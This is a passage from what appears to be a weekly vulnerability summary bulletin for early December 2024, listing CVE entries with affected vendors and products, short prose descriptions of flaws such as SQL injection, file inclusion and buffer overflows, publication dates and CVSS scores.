| n/a -- n/a |
gitingest before 9996a06 mishandles symbolic links that point outside of the base directory. | 2024-12-15 | not yet calculated | CVE-2024-56074 |
| n/a -- n/a |
ChatBar.tsx in Lumos before 1.0.17 parses raw HTML in Markdown because the markdown-to-jsx package is used without disableParsingRawHTML set to true. | 2024-12-15 | not yet calculated | CVE-2024-56082 |
| n/a -- n/a |
Use of Hardware Page Aggregation (HPA) and Stage-1 and/or Stage-2 translation on A77, A78, A78C, A78AE, A710, V1, V2, V3, V3AE, X1, X1C, X2, X3, X4, N2, X925 & Travis may permit bypass of Stage-2 translation and/or GPT protection | 2024-12-10 | not yet calculated | CVE-2024-5660 |
| n/a -- n/a |
Insufficient permissions in Ivanti DSM before version 2024.3.5740 allows a local authenticated attacker to delete arbitrary files. | 2024-12-10 | not yet calculated | CVE-2024-7572 |
| n/a -- n/a |
Use of Password Hash With Insufficient Computational Effort vulnerability in percona percona-toolkit allows Encryption Brute Forcing.This issue affects percona-toolkit: 3.6.0. | 2024-12-15 | not yet calculated | CVE-2024-7701 |
| n/a -- n/a |
An issue has been discovered in GitLab CE/EE affecting all versions from 17.3 before 17.4.6, 17.5 before 17.5.4, and 17.6 before 17.6.2. Improper output encoding could lead to XSS if CSP is not enabled. | 2024-12-12 | not yet calculated | CVE-2024-8179 |
| n/a -- n/a |
An issue has been discovered in GitLab CE/EE affecting all versions from 9.4 before 17.4.6, 17.5 before 17.5.4, and 17.6 before 17.6.2. An attacker could cause a denial of service with requests for diff files on a commit or merge request. | 2024-12-12 | not yet calculated | CVE-2024-8233 |
| n/a -- n/a |
In Teltonika Networks RUTOS devices, running on versions 7.0 to 7.8 (excluding) and TSWOS devices running on versions 1.0 to 1.3 (excluding), due to incorrect permission handling a vulnerability exists which allows a lower privileged user with default permissions to access critical device resources via the API. | 2024-12-10 | not yet calculated | CVE-2024-8256 |
| n/a -- n/a |
Insecure permissions in Ivanti Sentry before versions 9.20.2 and 10.0.2 or 10.1.0 allow a local authenticated attacker to modify sensitive application components. | 2024-12-10 | not yet calculated | CVE-2024-8540 |
| n/a -- n/a |
An issue was discovered in GitLab affecting all versions starting 15.2 to 17.4.6, 17.5 prior to 17.5.4, and 17.6 prior to 17.6.2. On self hosted installs, it was possible to leak the anti-CSRF-token to an external site while the Harbor integration was enabled. | 2024-12-12 | not yet calculated | CVE-2024-8647 |
| n/a -- n/a |
An issue was discovered in GitLab CE/EE affecting all versions starting from 13.9 before 17.4.6, 17.5 before 17.5.4, and 17.6 before 17.6.2, that allows an attacker to cause uncontrolled CPU consumption, potentially leading to a Denial of Service (DoS) condition while parsing templates to generate changelogs. | 2024-12-12 | not yet calculated | CVE-2024-9367 |
| n/a -- n/a |
An issue was discovered in GitLab CE/EE affecting all versions from 11.8 before 17.4.6, 17.5 before 17.5.4, and 17.6 before 17.6.2. An attacker could potentially perform an open redirect against a given releases API endpoint. | 2024-12-12 | not yet calculated | CVE-2024-9387 |
| n/a -- n/a |
The Popup Builder WordPress plugin before 4.3.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-12 | not yet calculated | CVE-2024-9428 |
| n/a -- n/a |
Horner Automation Cscape contains a memory corruption vulnerability, which could allow an attacker to disclose information and execute arbitrary code. | 2024-12-13 | not yet calculated | CVE-2024-9508 |
| n/a -- n/a |
The LuckyWP Table of Contents WordPress plugin before 2.1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-12 | not yet calculated | CVE-2024-9641 |
| n/a -- n/a |
The Fluent Forms WordPress plugin before 5.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-09 | not yet calculated | CVE-2024-9651 |
| n/a -- n/a |
A reflected cross-site scripting (XSS) vulnerability exists in PaperCut NG/MF. This issue can be used to execute specially created JavaScript payloads in the browser. A user must click on a malicious link for this issue to occur. | 2024-12-10 | not yet calculated | CVE-2024-9672 |
| n/a -- n/a |
Insufficient server-side controls in Secure Application Manager of Ivanti Connect Secure before version 22.7R2.4 allows a remote authenticated attacker to bypass restrictions. | 2024-12-10 | not yet calculated | CVE-2024-9844 |
| n/a -- n/a |
The LearnPress WordPress plugin before 4.2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-12 | not yet calculated | CVE-2024-9881 |
| n/a -- n/a |
An information-disclosure vulnerability exists in Fortra's GoAnywhere MFT application prior to version 7.7.0 that allows external access to the resources in certain admin root folders. | 2024-12-13 | not yet calculated | CVE-2024-9945 |
Vulnerability Summary for the Week of December 2, 2024
Posted on Monday December 09, 2024
High Vulnerabilities
| Primary Vendor -- Product |
Description8 | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| SailPoint Technologies--IdentityIQ |
IdentityIQ 8.4 and all 8.4 patch levels prior to 8.4p2, IdentityIQ 8.3 and all 8.3 patch levels prior to 8.3p5, IdentityIQ 8.2 and all 8.2 patch levels prior to 8.2p8, and all prior versions allow HTTP/HTTPS access to static content in the IdentityIQ application directory that should be protected. | 2024-12-02 | 10 | CVE-2024-10905 |
| ABB--ASPECT-Enterprise |
Session Fixation vulnerabilities allow an attacker to fix a users session identifier before login providing an opportunity for session takeover on a product. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 10 | CVE-2024-11317 |
| ABB--ASPECT-Enterprise |
Improper Input Validation vulnerability allows Remote Code Execution. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 10 | CVE-2024-48839 |
| ABB--ASPECT-Enterprise |
Unauthorized Access vulnerabilities allow Remote Code Execution. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 10 | CVE-2024-48840 |
| ABB--ASPECT-Enterprise |
Username Enumeration vulnerabilities allow access to application level username add, delete, modify and list functions. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 10 | CVE-2024-51545 |
| ABB--ASPECT-Enterprise |
Absolute File Traversal vulnerabilities allows access and modification of un-intended resources. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 10 | CVE-2024-51549 |
| ABB--ASPECT-Enterprise |
Data Validation / Data Sanitization vulnerabilities in Linux allows unvalidated and unsanitized data to be injected in an Aspect device. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 10 | CVE-2024-51550 |
| ABB--ASPECT-Enterprise |
Default Credentail vulnerabilities in ASPECT on Linux allows access to the product using publicly available default credentials. Affected products: ABB ASPECT - Enterprise v3.07.02; NEXUS Series v3.07.02; MATRIX Series v3.07.02 | 2024-12-05 | 10 | CVE-2024-51551 |
| ABB--ASPECT-Enterprise |
Default Credentail vulnerabilities allows access to an Aspect device using publicly available default credentials since the system does not require the installer to change default credentials. Affected products: ABB ASPECT - Enterprise v3.07.02; NEXUS Series v3.07.02; MATRIX Series v3.07.02 | 2024-12-05 | 10 | CVE-2024-51555 |
| stefanbohacek--Fediverse Embeds |
Unrestricted Upload of File with Dangerous Type vulnerability in stefanbohacek Fediverse Embeds allows Upload a Web Shell to a Web Server.This issue affects Fediverse Embeds: from n/a through 1.5.3. | 2024-12-02 | 10 | CVE-2024-52476 |
| NotFound--Revy |
Unrestricted Upload of File with Dangerous Type vulnerability in NotFound Revy allows Upload a Web Shell to a Web Server.This issue affects Revy: from n/a through 1.18. | 2024-12-06 | 10 | CVE-2024-54214 |
| Google--Android |
In prop2cfg of btif_storage.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-12-02 | 9.8 | CVE-2018-9430 |
| SICK AG--SICK InspectorP61x |
The product is vulnerable to pass-the-hash attacks in combination with hardcoded credentials of hidden user levels. This means that an attacker can log in with the hidden user levels and gain full access to the device. | 2024-12-06 | 9 | CVE-2024-10773 |
| matthias-reuter--SV100 Companion |
The SV100 Companion plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the settings_import() function in all versions up to, and including, 2.0.02. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. | 2024-12-06 | 9.8 | CVE-2024-12155 |
| wphealth--WP Umbrella: Update Backup Restore & Monitoring |
The WP Umbrella: Update Backup Restore & Monitoring plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.17.0 via the 'filename' parameter of the 'umbrella-restore' action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2024-12-08 | 9.8 | CVE-2024-12209 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a buffer overflow via the nav2_amcl process. This vulnerability is triggered via sending a crafted .yaml file. | 2024-12-05 | 9.8 | CVE-2024-37861 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a buffer overflow via the nav2_amcl process. This vulnerability is triggered via sending a crafted .yaml file. | 2024-12-05 | 9.8 | CVE-2024-37863 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggerd via remotely sending a request for change the value of dynamic-parameter`/amcl max_beams` . | 2024-12-05 | 9.1 | CVE-2024-38920 |
| tassos.gr--Convert Forms component for Joomla |
Unrestricted file upload via security bypass in Convert Forms component for Joomla in versions before 4.4.8. | 2024-12-04 | 9.8 | CVE-2024-40744 |
| Progress Software Corporation--WhatsUp Gold |
In WhatsUp Gold versions released before 2024.0.1, a remote unauthenticated attacker could leverage this vulnerability to execute code in the context of the service account. | 2024-12-02 | 9.8 | CVE-2024-46909 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x contains a weak mechanism for its users to change their passwords which leaves authentication vulnerable to brute force attacks. | 2024-12-06 | 9.4 | CVE-2024-47547 |
| ABB--ASPECT-Enterprise |
Weak Password Reset Rules vulnerabilities where found providing a potiential for the storage of weak passwords that could facilitate unauthorized admin/application access. Affected products: ABB ASPECT - Enterprise v3.07.02; NEXUS Series v3.07.02; MATRIX Series v3.07.02 | 2024-12-05 | 9.4 | CVE-2024-48845 |
| Planet Technology--Planet WGS-804HPT |
The affected product is vulnerable to a stack-based buffer overflow. An unauthenticated attacker could send a malicious HTTP request that the webserver fails to properly check input size before copying data to the stack, potentially allowing remote code execution. | 2024-12-06 | 9.8 | CVE-2024-48871 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x could give attackers the ability to force Ruijie's proxy servers to perform any request the attackers choose. Using this, attackers could access internal services used by Ruijie and their internal cloud infrastructure via AWS cloud metadata services. | 2024-12-06 | 9.8 | CVE-2024-48874 |
| ABB--ASPECT-Enterprise |
Dangerous File Upload vulnerabilities allow upload of malicious scripts. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 9.9 | CVE-2024-51548 |
| ABB--ASPECT-Enterprise |
Default Credentail vulnerabilities in ASPECT on Linux allows access to the product using publicly available default credentials. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 9.1 | CVE-2024-51554 |
| Owen Cutajar & Hyder Jaffari--WordPress Auction Plugin |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Owen Cutajar & Hyder Jaffari WordPress Auction Plugin allows SQL Injection.This issue affects WordPress Auction Plugin: from n/a through 3.7. | 2024-12-06 | 9.3 | CVE-2024-51615 |
| WP Sharks--s2Member Pro |
Improper Control of Generation of Code ('Code Injection') vulnerability in WP Sharks s2Member Pro allows Code Injection.This issue affects s2Member Pro: from n/a through 241114. | 2024-12-06 | 9 | CVE-2024-51815 |
| Planet Technology--Planet WGS-804HPT |
The affected product is vulnerable to a command injection. An unauthenticated attacker could send commands through a malicious HTTP request which could result in remote code execution. | 2024-12-06 | 9.8 | CVE-2024-52320 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x uses an inherently dangerous function which could allow an attacker to send a malicious MQTT message resulting in devices executing arbitrary OS commands. | 2024-12-06 | 9.8 | CVE-2024-52324 |
| Siemens--syngo.plaza VB30E |
A vulnerability has been identified in syngo.plaza VB30E (All versions < VB30E_HF05). The affected application do not properly sanitize input data before sending it to the SQL server. This could allow an attacker with access to the application could use this vulnerability to execute malicious SQL commands to compromise the whole database. | 2024-12-06 | 9.8 | CVE-2024-52335 |
| Lorex--2K Indoor Wi-Fi Security Camera |
An unauthenticated attacker can trigger a stack based buffer overflow in the DP Service (TCP port 3500). This vulnerability has been resolved in firmware version 2.800.0000000.8.R.20241111. | 2024-12-03 | 9.8 | CVE-2024-52544 |
| n/a--n/a |
ZZCMS 2023 was discovered to contain a SQL injection vulnerability in /q/show.php. | 2024-12-02 | 9.8 | CVE-2024-52724 |
| n/a--n/a |
Incorrect access control in wms-Warehouse management system-zeqp v2.20.9.1 due to the token value of the zeqp system being reused. | 2024-12-02 | 9.1 | CVE-2024-52732 |
| Najeeb Ahmad--Simple User Registration |
Missing Authorization vulnerability in Najeeb Ahmad Simple User Registration allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Simple User Registration: from n/a through 5.5. | 2024-12-06 | 9.1 | CVE-2024-53810 |
| n/a--n/a |
Mongoose before 8.8.3 can improperly use $where in match, leading to search injection. | 2024-12-02 | 9.1 | CVE-2024-53900 |
| n/a--n/a |
An issue was discovered in Django 5.1 before 5.1.4, 5.0 before 5.0.10, and 4.2 before 4.2.17. Direct usage of the django.db.models.fields.json.HasKey lookup, when an Oracle database is used, is subject to SQL injection if untrusted data is used as an lhs value. (Applications that use the jsonfield.has_key lookup via __ are unaffected.) | 2024-12-06 | 9.8 | CVE-2024-53908 |
| MacWarrior--clipbucket-v5 |
ClipBucket V5 provides open source video hosting with PHP. ClipBucket-v5 Version 2.0 to Version 5.5.1 Revision 199 are vulnerable to PHP Deserialization vulnerability. The vulnerability exists in upload/photo_upload.php within the decode_key function. User inputs were supplied to this function without sanitization via collection GET parameter and photoIDS POST parameter respectively. The decode_key function invokes PHP unserialize function as defined in upload/includes/classes/photos.class.php. As a result, it is possible for an adversary to inject maliciously crafted PHP serialized object and utilize gadget chains to cause unexpected behaviors of the application. This vulnerability is fixed in 5.5.1 Revision 200. | 2024-12-06 | 9.8 | CVE-2024-54135 |
| MacWarrior--clipbucket-v5 |
ClipBucket V5 provides open source video hosting with PHP. ClipBucket-v5 Version 5.5.1 Revision 199 and below is vulnerable to PHP Deserialization vulnerability. The vulnerability exists in upload/upload.php where the user supplied input via collection get parameter is directly provided to unserialize function. As a result, it is possible for an adversary to inject maliciously crafted PHP serialized object and utilize gadget chains to cause unexpected behaviors of the application. This vulnerability is fixed in 5.5.1 Revision 200. | 2024-12-06 | 9.8 | CVE-2024-54136 |
| Roninwp--FAT Services Booking |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Roninwp FAT Services Booking.This issue affects FAT Services Booking: from n/a through 5.6. | 2024-12-05 | 9.3 | CVE-2024-54221 |
| n/a--n/a |
readline.sh in socat through 1.8.0.1 relies on the /tmp/$USER/stderr2 file. | 2024-12-04 | 9.8 | CVE-2024-54661 |
| n/a--n/a |
Ubiquiti U6-LR 6.6.65 was discovered to contain a hardcoded password vulnerability in /etc/shadow, which allows attackers to log in as root. | 2024-12-06 | 9.8 | CVE-2024-54750 |
| ABB--ASPECT-Enterprise |
Web browser interface may manipulate application username/password in clear text or Base64 encoding providing a higher probability of unintended credentails exposure. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 9.6 | CVE-2024-6515 |
| ABB--ASPECT-Enterprise |
Cross Site Scripting vulnerabilities where found providing a potential for malicious scripts to be injected into a client browser. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 9 | CVE-2024-6516 |
| ABB--ASPECT-Enterprise |
Server-Side Request Forgery vulnerabilities were found providing a potential for access to unauthorized resources and unintended information disclosure. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 9.9 | CVE-2024-6784 |
| Progress Software Corporation--WhatsUp Gold |
In WhatsUp Gold versions released before 2024.0.1, a remote unauthenticated attacker could leverage NmAPI.exe to create or change an existing registry value in registry path HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\. | 2024-12-02 | 9.8 | CVE-2024-8785 |
| Google--Android |
In l2c_lcc_proc_pdu of l2c_fcr.cc, there is a possible out of bounds write due to improper input validation. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-12-02 | 8.8 | CVE-2018-9380 |
| Google--Android |
In multiple functions of gl_proc.c, there is a buffer overwrite due to a missing bounds check. This could lead to escalation of privileges in the kernel. | 2024-12-05 | 8.8 | CVE-2018-9402 |
| Google--Android |
In handle_notification_response of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-12-02 | 8 | CVE-2018-9413 |
| Google--Android |
In handle_app_cur_val_response of dtif_rc.cc, there is a possible stack buffer overflow due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-12-02 | 8.8 | CVE-2018-9418 |
| Apache Software Foundation--Apache Hive |
Apache Hive Metastore (HMS) uses SerializationUtilities#deserializeObjectWithTypeInformation method when filtering and fetching partitions that is unsafe and can lead to Remote Code Execution (RCE) since it allows the deserialization of arbitrary data. In real deployments, the vulnerability can be exploited only by authenticated users/clients that were able to successfully establish a connection to the Metastore. From an API perspective any code that calls the unsafe method may be vulnerable unless it performs additional prerechecks on the input arguments. | 2024-12-05 | 8.3 | CVE-2022-41137 |
| NVIDIA--UFM Enterprise GA |
NVIDIA UFM Enterprise, UFM Appliance, and UFM CyberAI contain a vulnerability where an attacker can cause an improper authentication issue by sending a malformed request through the Ethernet management interface. A successful exploit of this vulnerability might lead to escalation of privileges, data tampering, denial of service, and information disclosure. | 2024-12-06 | 8.8 | CVE-2024-0130 |
| OpenHarmony--OpenHarmony |
in OpenHarmony v4.1.1 and prior versions allow a local attacker cause the common permission is upgraded to root through use after free. | 2024-12-03 | 8.8 | CVE-2024-10074 |
| swte--Swift Performance Lite |
The Swift Performance Lite plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 2.3.7.1 via the 'ajaxify' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2024-12-06 | 8.1 | CVE-2024-10516 |
| blazethemes--Pubnews |
The Pubnews theme for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the pubnews_importer_plugin_action_for_notice() function in all versions up to, and including, 1.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins that can be leveraged to exploit other vulnerabilities. | 2024-12-06 | 8.8 | CVE-2024-10578 |
| funnelforms--Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor Funnelforms Free |
The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor - Funnelforms Free plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.7.4.1 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2024-12-04 | 8.8 | CVE-2024-10587 |
| SICK AG--SICK InspectorP61x |
Due to missing input validation during one step of the firmware update process, the product is vulnerable to remote code execution. With network access and the user level "Service", an attacker can execute arbitrary system commands in the root user's contexts. | 2024-12-06 | 8.8 | CVE-2024-10771 |
| SICK AG--SICK InspectorP61x |
Since the firmware update is not validated, an attacker can install modified firmware on the device. This has a high impact on the availabilty, integrity and confidentiality up to the complete compromise of the device. | 2024-12-06 | 8.8 | CVE-2024-10772 |
| SICK AG--SICK InspectorP61x |
Lua apps can be deployed, removed, started, reloaded or stopped without authorization via AppManager. This allows an attacker to remove legitimate apps creating a DoS attack, read and write files or load apps that use all features of the product available to a customer. | 2024-12-06 | 8.2 | CVE-2024-10776 |
| india-web-developer--Login With OTP |
The Login With OTP plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.4.2. This is due to the plugin generating too weak OTP, and there's no attempt or time limit. This makes it possible for unauthenticated attackers to generate and brute force the 6-digit numeric OTP that makes it possible to log in as any existing user on the site, such as an administrator, if they have access to the email. | 2024-12-06 | 8.1 | CVE-2024-11178 |
| pencidesign--Soledad |
The Soledad theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 8.5.9 via several functions like penci_archive_more_post_ajax_func, penci_more_post_ajax_func, and penci_more_featured_post_ajax_func. This makes it possible for unauthenticated attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included. The exploitability of this is limited to Windows. | 2024-12-06 | 8.1 | CVE-2024-11289 |
| Genetech Solutions--Pie Register - Social Sites Login (Add on) |
The Registration Forms - User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction Social Sites Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.7.9. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token. | 2024-12-04 | 8.1 | CVE-2024-11293 |
| kekotron--AI Quiz | Quiz Maker |
The AI Quiz | Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ai_quiz_update_style() function in all versions up to, and including, 1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. | 2024-12-06 | 8.8 | CVE-2024-11323 |
| Synology--Synology Router Manager (SRM) |
Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in OTP reset functionality in Synology Router Manager (SRM) before 1.3.1-9346-9 allows remote authenticated users to delete arbitrary files via unspecified vectors. | 2024-12-04 | 8.1 | CVE-2024-11398 |
| galdub--Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews Stars Testimonials |
The Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews - Stars Testimonials plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'stars-testimonials-with-slider-and-masonry-grid' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included. | 2024-12-05 | 8.8 | CVE-2024-11429 |
| webdzier--Gallery |
The Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3 via deserialization of untrusted input from wd_gallery_$id parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2024-12-07 | 8.8 | CVE-2024-11501 |
| allaccessible--Accessibility by AllAccessible |
The Accessibility by AllAccessible plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'AllAccessible_save_settings' function in all versions up to, and including, 1.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. | 2024-12-04 | 8.8 | CVE-2024-11643 |
| Google--Chrome |
Type Confusion in V8 in Google Chrome prior to 131.0.6778.108 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) | 2024-12-03 | 8.8 | CVE-2024-12053 |
| Devolutions--Remote Desktop Manager |
Incorrect permission assignment in temporary access requests component in Devolutions Remote Desktop Manager 2024.3.19.0 and earlier on Windows allows an authenticated user that request temporary permissions on an entry to obtain more privileges than requested. | 2024-12-04 | 8.1 | CVE-2024-12149 |
| Snyk--Code Agent |
Snyk has identified a remote code execution (RCE) vulnerability in all versions of Code Agent. The vulnerability enables an attacker to execute arbitrary code within the Code Agent container. Exploiting this vulnerability would require an attacker to have network access to the Code Agent within the deployment environment. External exploitation of this vulnerability is unlikely and depends on both misconfigurations of the cluster and/or chaining with another vulnerability. However, internal exploitation (with a cluster misconfiguration) could still be possible. | 2024-12-06 | 8.1 | CVE-2024-21571 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while Configuring the SMR/S2CR register in Bypass mode. | 2024-12-02 | 8.4 | CVE-2024-33044 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption when allocating and accessing an entry in an SMEM partition continuously. | 2024-12-02 | 8.4 | CVE-2024-33056 |
| n/a--n/a |
An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 9820, 9825, 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 9110, W920, W930, W1000, Modem 5123, Modem 5300. The baseband software does not properly check the length specified by the CC (Call Control). This can lead to an Out-of-Bounds write. | 2024-12-02 | 8.1 | CVE-2024-39890 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 could be vulnerable to malicious file upload by not validating the content of the file uploaded to the web interface. Attackers can make use of this weakness and upload malicious executable files into the system, and it can be sent to victim for performing further attacks. | 2024-12-03 | 8 | CVE-2024-40691 |
| Dell--NetWorker |
Dell NetWorker, version(s) 19.10, contain(s) an Authorization Bypass Through User-Controlled Key vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure. | 2024-12-03 | 8.3 | CVE-2024-42422 |
| Apache Software Foundation--Apache Ozone |
Improper authentication of an HTTP endpoint in the S3 Gateway of Apache Ozone 1.4.0 allows any authenticated Kerberos user to revoke and regenerate the S3 secrets of any other user. This is only possible if: * ozone.s3g.secret.http.enabled is set to true. The default value of this configuration is false. * The user configured in ozone.s3g.kerberos.principal is also configured in ozone.s3.administrators or ozone.administrators. Users are recommended to upgrade to Apache Ozone version 1.4.1 which disables the affected endpoint. | 2024-12-03 | 8.1 | CVE-2024-45106 |
| SonicWall--SMA100 |
A vulnerability in the SonicWall SMA100 SSLVPN web management interface allows remote attackers to cause Stack-based buffer overflow and potentially lead to code execution. | 2024-12-05 | 8.1 | CVE-2024-45318 |
| n/a--n/a |
An issue in InfoDom Performa 365 v4.0.1 allows authenticated attackers to elevate their privileges to Administrator via a crafted payload sent to /api/users. | 2024-12-03 | 8.8 | CVE-2024-46624 |
| Ruijie--Reyee OS |
Ruijie Reyee OS versions 2.206.x up to but not including 2.320.x could allow MQTT clients connecting with device credentials to send messages to some topics. Attackers with device credentials could issue commands to other devices on behalf of Ruijie's cloud. | 2024-12-06 | 8.1 | CVE-2024-46874 |
| progress -- whatsup_gold |
In WhatsUp Gold versions released before 2024.0.1, a SQL Injection vulnerability allows an authenticated lower-privileged user (at least Network Manager permissions required) to achieve privilege escalation to the admin account. | 2024-12-02 | 8.8 | CVE-2024-46905 |
| progress -- whatsup_gold |
In WhatsUp Gold versions released before 2024.0.1, a SQL Injection vulnerability allows an authenticated low-privileged user (at least Report Viewer permissions required) to achieve privilege escalation to the admin account. | 2024-12-02 | 8.8 | CVE-2024-46906 |
| Progress Software Corporation--WhatsUp Gold |
In WhatsUp Gold versions released before 2024.0.1, a SQL Injection vulnerability allows an authenticated low-privileged user (at least Report Viewer permissions required) to achieve privilege escalation to the admin account. | 2024-12-02 | 8.8 | CVE-2024-46907 |
| Progress Software Corporation--WhatsUp Gold |
In WhatsUp Gold versions released before 2024.0.1, a SQL Injection vulnerability allows an authenticated low-privileged user (at least Report Viewer permissions required) to achieve privilege escalation to the admin account. | 2024-12-02 | 8.8 | CVE-2024-46908 |
| ABB--ASPECT-Enterprise |
MD5 Checksum Bypass vulnerabilities where found exploiting a weakness in the way an application dependency calculates or validates MD5 checksum hashes. Affected products: ABB ASPECT - Enterprise v3.08.01; NEXUS Series v3.08.01; MATRIX Series v3.08.01 | 2024-12-05 | 8.2 | CVE-2024-48847 |
| Samsung Mobile--Samsung Mobile Devices |
Out-of-bound write in libsaped.so prior to SMR Dec-2024 Release 1 allows remote attackers to execute arbitrary code. | 2024-12-03 | 8.1 | CVE-2024-49415 |
| n/a--n/a |
